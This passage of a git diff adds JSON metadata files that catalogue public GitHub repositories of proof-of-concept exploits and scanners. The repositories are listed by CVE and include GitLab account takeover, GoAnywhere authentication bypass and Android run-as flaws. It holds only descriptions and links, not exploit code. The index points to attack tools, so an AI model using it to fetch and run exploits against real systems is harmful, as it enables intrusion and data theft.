+ "forks": 2,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 742381856,
+ "name": "CVE-2023-7028",
+ "full_name": "RandomRobbieBF\/CVE-2023-7028",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-7028",
+ "description": "CVE-2023-7028",
+ "fork": false,
+ "created_at": "2024-01-12T10:53:50Z",
+ "updated_at": "2024-06-12T15:15:28Z",
+ "pushed_at": "2024-01-12T13:56:38Z",
+ "stargazers_count": 55,
+ "watchers_count": 55,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-7028",
+ "gitlab"
+ ],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 55,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 742480461,
+ "name": "CVE-2023-7028",
+ "full_name": "duy-31\/CVE-2023-7028",
+ "owner": {
+ "login": "duy-31",
+ "id": 20819326,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4",
+ "html_url": "https:\/\/github.com\/duy-31"
+ },
+ "html_url": "https:\/\/github.com\/duy-31\/CVE-2023-7028",
+ "description": "An issue has been discovered in GitLab CE\/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.",
+ "fork": false,
+ "created_at": "2024-01-12T15:17:59Z",
+ "updated_at": "2024-03-02T01:56:32Z",
+ "pushed_at": "2024-01-12T20:18:04Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 742554037,
+ "name": "CVE-2023-7028",
+ "full_name": "Vozec\/CVE-2023-7028",
+ "owner": {
+ "login": "Vozec",
+ "id": 61807609,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61807609?v=4",
+ "html_url": "https:\/\/github.com\/Vozec"
+ },
+ "html_url": "https:\/\/github.com\/Vozec\/CVE-2023-7028",
+ "description": "This repository presents a proof-of-concept of CVE-2023-7028",
+ "fork": false,
+ "created_at": "2024-01-12T18:29:27Z",
+ "updated_at": "2024-06-21T00:11:53Z",
+ "pushed_at": "2024-01-13T13:50:20Z",
+ "stargazers_count": 237,
+ "watchers_count": 237,
+ "has_discussions": false,
+ "forks_count": 40,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 40,
+ "watchers": 237,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 744835323,
+ "name": "CVE-2023-7028",
+ "full_name": "yoryio\/CVE-2023-7028",
+ "owner": {
+ "login": "yoryio",
+ "id": 134471901,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4",
+ "html_url": "https:\/\/github.com\/yoryio"
+ },
+ "html_url": "https:\/\/github.com\/yoryio\/CVE-2023-7028",
+ "description": "Exploit for CVE-2023-7028 - GitLab CE\/EE",
+ "fork": false,
+ "created_at": "2024-01-18T05:17:00Z",
+ "updated_at": "2024-03-29T00:15:31Z",
+ "pushed_at": "2024-03-14T05:30:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-7028",
+ "gitlab"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 744940880,
+ "name": "gitlab_honeypot",
+ "full_name": "Esonhugh\/gitlab_honeypot",
+ "owner": {
+ "login": "Esonhugh",
+ "id": 32677240,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32677240?v=4",
+ "html_url": "https:\/\/github.com\/Esonhugh"
+ },
+ "html_url": "https:\/\/github.com\/Esonhugh\/gitlab_honeypot",
+ "description": "CVE-2023-7028 killer",
+ "fork": false,
+ "created_at": "2024-01-18T10:13:18Z",
+ "updated_at": "2024-01-24T01:41:36Z",
+ "pushed_at": "2024-01-18T10:31:11Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 747135442,
+ "name": "CVE-2023-7028-Account-Take-Over-Gitlab",
+ "full_name": "Shimon03\/CVE-2023-7028-Account-Take-Over-Gitlab",
+ "owner": {
+ "login": "Shimon03",
+ "id": 78235187,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78235187?v=4",
+ "html_url": "https:\/\/github.com\/Shimon03"
+ },
+ "html_url": "https:\/\/github.com\/Shimon03\/CVE-2023-7028-Account-Take-Over-Gitlab",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-23T10:37:07Z",
+ "updated_at": "2024-01-23T11:01:04Z",
+ "pushed_at": "2024-01-23T11:00:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 747356855,
+ "name": "CVE-2023-7028",
+ "full_name": "thanhlam-attt\/CVE-2023-7028",
+ "owner": {
+ "login": "thanhlam-attt",
+ "id": 79523444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79523444?v=4",
+ "html_url": "https:\/\/github.com\/thanhlam-attt"
+ },
+ "html_url": "https:\/\/github.com\/thanhlam-attt\/CVE-2023-7028",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-23T19:11:11Z",
+ "updated_at": "2024-05-05T02:05:02Z",
+ "pushed_at": "2024-01-23T19:22:58Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 748113457,
+ "name": "CVE-2023-7028-Docker",
+ "full_name": "Trackflaw\/CVE-2023-7028-Docker",
+ "owner": {
+ "login": "Trackflaw",
+ "id": 78696986,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4",
+ "html_url": "https:\/\/github.com\/Trackflaw"
+ },
+ "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2023-7028-Docker",
+ "description": "Repository to install CVE-2023-7028 vulnerable Gitlab instance",
+ "fork": false,
+ "created_at": "2024-01-25T09:56:00Z",
+ "updated_at": "2024-01-25T09:56:01Z",
+ "pushed_at": "2024-01-25T10:18:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 748516354,
+ "name": "CVE-2023-7028",
+ "full_name": "mochammadrafi\/CVE-2023-7028",
+ "owner": {
+ "login": "mochammadrafi",
+ "id": 73122628,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73122628?v=4",
+ "html_url": "https:\/\/github.com\/mochammadrafi"
+ },
+ "html_url": "https:\/\/github.com\/mochammadrafi\/CVE-2023-7028",
+ "description": "Python Code for Exploit Automation CVE-2023-7028",
+ "fork": false,
+ "created_at": "2024-01-26T06:29:34Z",
+ "updated_at": "2024-01-26T06:32:54Z",
+ "pushed_at": "2024-01-26T06:32:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 749490677,
+ "name": "gitlab-exploit",
+ "full_name": "hackeremmen\/gitlab-exploit",
+ "owner": {
+ "login": "hackeremmen",
+ "id": 97889952,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97889952?v=4",
+ "html_url": "https:\/\/github.com\/hackeremmen"
+ },
+ "html_url": "https:\/\/github.com\/hackeremmen\/gitlab-exploit",
+ "description": "GitLab CVE-2023-7028",
+ "fork": false,
+ "created_at": "2024-01-28T18:23:31Z",
+ "updated_at": "2024-01-29T03:26:47Z",
+ "pushed_at": "2024-01-28T18:24:46Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-7172.json b/2023/CVE-2023-7172.json
new file mode 100644
index 0000000000..9c2a37b6db
--- /dev/null
+++ b/2023/CVE-2023-7172.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 738005679,
+ "name": "CVE-2023-7172",
+ "full_name": "sharathc213\/CVE-2023-7172",
+ "owner": {
+ "login": "sharathc213",
+ "id": 63504490,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63504490?v=4",
+ "html_url": "https:\/\/github.com\/sharathc213"
+ },
+ "html_url": "https:\/\/github.com\/sharathc213\/CVE-2023-7172",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-02T07:28:25Z",
+ "updated_at": "2024-04-10T05:44:06Z",
+ "pushed_at": "2024-01-02T08:01:27Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-7173.json b/2023/CVE-2023-7173.json
new file mode 100644
index 0000000000..edf3a7b791
--- /dev/null
+++ b/2023/CVE-2023-7173.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 738027789,
+ "name": "CVE-2023-7173",
+ "full_name": "sharathc213\/CVE-2023-7173",
+ "owner": {
+ "login": "sharathc213",
+ "id": 63504490,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63504490?v=4",
+ "html_url": "https:\/\/github.com\/sharathc213"
+ },
+ "html_url": "https:\/\/github.com\/sharathc213\/CVE-2023-7173",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-02T08:41:10Z",
+ "updated_at": "2024-04-10T05:44:06Z",
+ "pushed_at": "2024-01-02T08:55:56Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0015.json b/2024/CVE-2024-0015.json
new file mode 100644
index 0000000000..86f5033fba
--- /dev/null
+++ b/2024/CVE-2024-0015.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 774300309,
+ "name": "CVE-2024-0015",
+ "full_name": "UmVfX1BvaW50\/CVE-2024-0015",
+ "owner": {
+ "login": "UmVfX1BvaW50",
+ "id": 145543095,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145543095?v=4",
+ "html_url": "https:\/\/github.com\/UmVfX1BvaW50"
+ },
+ "html_url": "https:\/\/github.com\/UmVfX1BvaW50\/CVE-2024-0015",
+ "description": "a demo poc for CVE-2024-0015",
+ "fork": false,
+ "created_at": "2024-03-19T10:00:21Z",
+ "updated_at": "2024-06-25T06:22:28Z",
+ "pushed_at": "2024-03-19T10:05:07Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0039.json b/2024/CVE-2024-0039.json
new file mode 100644
index 0000000000..0ddff754e9
--- /dev/null
+++ b/2024/CVE-2024-0039.json
@@ -0,0 +1,42 @@
+[
+ {
+ "id": 807845235,
+ "name": "CVE-2024-0039-Exploit",
+ "full_name": "41yn14\/CVE-2024-0039-Exploit",
+ "owner": {
+ "login": "41yn14",
+ "id": 55758408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55758408?v=4",
+ "html_url": "https:\/\/github.com\/41yn14"
+ },
+ "html_url": "https:\/\/github.com\/41yn14\/CVE-2024-0039-Exploit",
+ "description": "Эксплойт для уязвимости CVE-2024-0039 на Android, который позволяет выполнять произвольный код через MP4 файл. Этот репозиторий создан для образовательных целей.",
+ "fork": false,
+ "created_at": "2024-05-29T22:13:04Z",
+ "updated_at": "2024-06-02T19:06:08Z",
+ "pushed_at": "2024-05-29T22:17:39Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "android",
+ "cve",
+ "ethical-hacking",
+ "exploit",
+ "mp4",
+ "python",
+ "remote-code-execution",
+ "security",
+ "security-research"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0044.json b/2024/CVE-2024-0044.json
new file mode 100644
index 0000000000..7b339eead8
--- /dev/null
+++ b/2024/CVE-2024-0044.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 816719987,
+ "name": "android_autorooter",
+ "full_name": "scs-labrat\/android_autorooter",
+ "owner": {
+ "login": "scs-labrat",
+ "id": 102700300,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102700300?v=4",
+ "html_url": "https:\/\/github.com\/scs-labrat"
+ },
+ "html_url": "https:\/\/github.com\/scs-labrat\/android_autorooter",
+ "description": "Exfiltrate sensitive user data from apps on Android 12 and 13 using CVE-2024-0044 vulnerability remotely",
+ "fork": false,
+ "created_at": "2024-06-18T09:22:59Z",
+ "updated_at": "2024-06-26T06:32:06Z",
+ "pushed_at": "2024-06-18T09:35:44Z",
+ "stargazers_count": 19,
+ "watchers_count": 19,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 19,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 816799428,
+ "name": "cve_2024_0044",
+ "full_name": "pl4int3xt\/cve_2024_0044",
+ "owner": {
+ "login": "pl4int3xt",
+ "id": 62325297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62325297?v=4",
+ "html_url": "https:\/\/github.com\/pl4int3xt"
+ },
+ "html_url": "https:\/\/github.com\/pl4int3xt\/cve_2024_0044",
+ "description": "CVE-2024-0044: a \"run-as any app\" high-severity vulnerability affecting Android versions 12 and 13",
+ "fork": false,
+ "created_at": "2024-06-18T12:30:53Z",
+ "updated_at": "2024-06-26T01:52:16Z",
+ "pushed_at": "2024-06-19T12:24:50Z",
+ "stargazers_count": 79,
+ "watchers_count": 79,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 79,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0195.json b/2024/CVE-2024-0195.json
new file mode 100644
index 0000000000..5cca10700c
--- /dev/null
+++ b/2024/CVE-2024-0195.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 813399149,
+ "name": "CVE-2024-0195",
+ "full_name": "Cappricio-Securities\/CVE-2024-0195",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-0195",
+ "description": "SpiderFlow Crawler Platform - Remote Code Execution",
+ "fork": false,
+ "created_at": "2024-06-11T02:34:34Z",
+ "updated_at": "2024-06-24T10:57:24Z",
+ "pushed_at": "2024-06-24T10:55:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2024-0195",
+ "pentesting",
+ "rce",
+ "spiderflow",
+ "wapt"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0197.json b/2024/CVE-2024-0197.json
new file mode 100644
index 0000000000..76a6920fe3
--- /dev/null
+++ b/2024/CVE-2024-0197.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 764157453,
+ "name": "CVE-2024-0197-POC",
+ "full_name": "ewilded\/CVE-2024-0197-POC",
+ "owner": {
+ "login": "ewilded",
+ "id": 1158719,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1158719?v=4",
+ "html_url": "https:\/\/github.com\/ewilded"
+ },
+ "html_url": "https:\/\/github.com\/ewilded\/CVE-2024-0197-POC",
+ "description": "Proof of concept for Local Privilege Escalation in Thales Sentinel HASP LDK.",
+ "fork": false,
+ "created_at": "2024-02-27T15:25:58Z",
+ "updated_at": "2024-04-04T00:15:46Z",
+ "pushed_at": "2024-02-27T15:30:16Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0204.json b/2024/CVE-2024-0204.json
new file mode 100644
index 0000000000..263a99b123
--- /dev/null
+++ b/2024/CVE-2024-0204.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 747380799,
+ "name": "CVE-2024-0204",
+ "full_name": "horizon3ai\/CVE-2024-0204",
+ "owner": {
+ "login": "horizon3ai",
+ "id": 79593994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4",
+ "html_url": "https:\/\/github.com\/horizon3ai"
+ },
+ "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-0204",
+ "description": "Authentication Bypass in GoAnywhere MFT",
+ "fork": false,
+ "created_at": "2024-01-23T20:16:14Z",
+ "updated_at": "2024-06-05T16:34:13Z",
+ "pushed_at": "2024-01-23T20:33:30Z",
+ "stargazers_count": 61,
+ "watchers_count": 61,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 61,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 747426521,
+ "name": "CVE-2024-0204",
+ "full_name": "cbeek-r7\/CVE-2024-0204",
+ "owner": {
+ "login": "cbeek-r7",
+ "id": 117099647,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117099647?v=4",
+ "html_url": "https:\/\/github.com\/cbeek-r7"
+ },
+ "html_url": "https:\/\/github.com\/cbeek-r7\/CVE-2024-0204",
+ "description": "Scanning for vulnerable GoAnywhere MFT CVE-2024-0204",
+ "fork": false,
+ "created_at": "2024-01-23T22:42:58Z",
+ "updated_at": "2024-02-19T06:58:12Z",
+ "pushed_at": "2024-01-23T22:44:05Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 747873972,
+ "name": "CVE-2024-0204",
+ "full_name": "m-cetin\/CVE-2024-0204",
+ "owner": {
+ "login": "m-cetin",
+ "id": 102237861,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102237861?v=4",
+ "html_url": "https:\/\/github.com\/m-cetin"
+ },
+ "html_url": "https:\/\/github.com\/m-cetin\/CVE-2024-0204",
+ "description": "This script exploits the CVE-2024-0204 vulnerability in Fortra GoAnywhere MFT, allowing the creation of unauthorized administrative users, for educational and authorized testing purposes.",
+ "fork": false,
+ "created_at": "2024-01-24T20:10:34Z",
+ "updated_at": "2024-04-05T14:01:39Z",
+ "pushed_at": "2024-01-24T20:17:01Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 752489740,
+ "name": "CVE-2024-0204",
+ "full_name": "adminlove520\/CVE-2024-0204",
+ "owner": {
+ "login": "adminlove520",
+ "id": 32920883,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32920883?v=4",
+ "html_url": "https:\/\/github.com\/adminlove520"
+ },
+ "html_url": "https:\/\/github.com\/adminlove520\/CVE-2024-0204",
+ "description": "GoAnywhere MFT",
+ "fork": false,
+ "created_at": "2024-02-04T01:40:46Z",
+ "updated_at": "2024-02-04T01:43:55Z",
+ "pushed_at": "2024-02-04T01:43:30Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0230.json b/2024/CVE-2024-0230.json
new file mode 100644
index 0000000000..5c7511eb5c
--- /dev/null
+++ b/2024/CVE-2024-0230.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 804066469,
+ "name": "cve-2024-0230-blue",
+ "full_name": "keldnorman\/cve-2024-0230-blue",
+ "owner": {
+ "login": "keldnorman",
+ "id": 10332862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10332862?v=4",
+ "html_url": "https:\/\/github.com\/keldnorman"
+ },
+ "html_url": "https:\/\/github.com\/keldnorman\/cve-2024-0230-blue",
+ "description": "Helper script to POC of CVE-2024-0230 Bluetooth",
+ "fork": false,
+ "created_at": "2024-05-21T22:23:57Z",
+ "updated_at": "2024-06-10T09:46:42Z",
+ "pushed_at": "2024-05-22T20:34:16Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0235.json b/2024/CVE-2024-0235.json
new file mode 100644
index 0000000000..3cec7ba9e0
--- /dev/null
+++ b/2024/CVE-2024-0235.json
@@ -0,0 +1,44 @@
+[
+ {
+ "id": 809827626,
+ "name": "CVE-2024-0235",
+ "full_name": "Cappricio-Securities\/CVE-2024-0235",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-0235",
+ "description": "EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure",
+ "fork": false,
+ "created_at": "2024-06-03T14:21:48Z",
+ "updated_at": "2024-06-24T10:19:50Z",
+ "pushed_at": "2024-06-24T10:19:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bugbounty",
+ "bugbounty-tool",
+ "bugbounty-tools",
+ "cve-2024-0235",
+ "cve-2024-0235-exploit",
+ "cve-2024-0235-poc",
+ "cve-2024-0235-scanner",
+ "eventon-scanner",
+ "information-disclosure",
+ "wordpress-scanner",
+ "wpscan"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0305.json b/2024/CVE-2024-0305.json
new file mode 100644
index 0000000000..51e7bc356e
--- /dev/null
+++ b/2024/CVE-2024-0305.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 788238757,
+ "name": "cve-2024-0305exp",
+ "full_name": "jidle123\/cve-2024-0305exp",
+ "owner": {
+ "login": "jidle123",
+ "id": 123531867,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123531867?v=4",
+ "html_url": "https:\/\/github.com\/jidle123"
+ },
+ "html_url": "https:\/\/github.com\/jidle123\/cve-2024-0305exp",
+ "description": "cve-2024-0305可用的exp",
+ "fork": false,
+ "created_at": "2024-04-18T03:13:43Z",
+ "updated_at": "2024-04-30T12:00:02Z",
+ "pushed_at": "2024-04-19T04:23:46Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0352.json b/2024/CVE-2024-0352.json
new file mode 100644
index 0000000000..78dbd650a8
--- /dev/null
+++ b/2024/CVE-2024-0352.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 814077972,
+ "name": "CVE-2024-0352",
+ "full_name": "Cappricio-Securities\/CVE-2024-0352",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-0352",
+ "description": "Likeshop < 2.5.7.20210311 - Arbitrary File Upload",
+ "fork": false,
+ "created_at": "2024-06-12T09:46:26Z",
+ "updated_at": "2024-06-24T11:05:53Z",
+ "pushed_at": "2024-06-24T11:04:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2024-0352",
+ "pentesting",
+ "rce",
+ "vulnerability",
+ "wapt"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-0399.json b/2024/CVE-2024-0399.json
new file mode 100644
index 0000000000..4475aea9e4
--- /dev/null
+++ b/2024/CVE-2024-0399.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 798415736,
+ "name": "CVE-2024-0399",
+ "full_name": "xbz0n\/CVE-2024-0399",
+ "owner": {
+ "login": "xbz0n",
+ "id": 40547674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40547674?v=4",
+ "html_url": "https:\/\/github.com\/xbz0n"
+ },
+ "html_url": "https:\/\/github.com\/xbz0n\/CVE-2024-0399",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-09T18:21:42Z",
+ "updated_at": "2024-05-09T18:24:59Z",
+ "pushed_at": "2024-05-09T18:24:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
